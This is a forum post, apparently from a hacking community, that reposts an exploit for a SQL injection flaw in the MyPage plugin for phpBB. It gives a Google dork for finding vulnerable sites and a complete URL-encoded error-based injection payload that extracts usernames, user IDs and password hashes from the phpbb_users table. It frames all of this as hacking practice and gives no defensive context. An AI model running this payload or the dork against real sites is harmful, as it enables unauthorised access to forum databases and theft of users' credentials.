Jump to content
co4ie

MyPage plugin (phpBB) SQL Injection (All versions)

Recommended Posts

Posted

====================================================

MyPage plugin (phpBB) SQL Injection (All versions)

====================================================

====================================================

Improve your hacking knowledges !

====================================================

# Exploit Title: SQL Injection on the plugin phpBB plugin MyPage

# Google Dork: inurl:"mypage.php?id="

# Date: 06/12/2011

# Author: CrazyMouse (from HackSociety.net)

# Version: 0.2.3 (this is the last avaliable version, older versions are also vulnerable)

# Tested on: Windows 7 x64 (Firefox)

====================================================

[~] Exploit:

   
http://localhost/forum/


[~] http://localhost/forum/mypage.php?id= (SQL)


[~] Example:

http://server/forum/mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271


====================================================

# Thanks to

Crassus

====================================================

Sursa

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...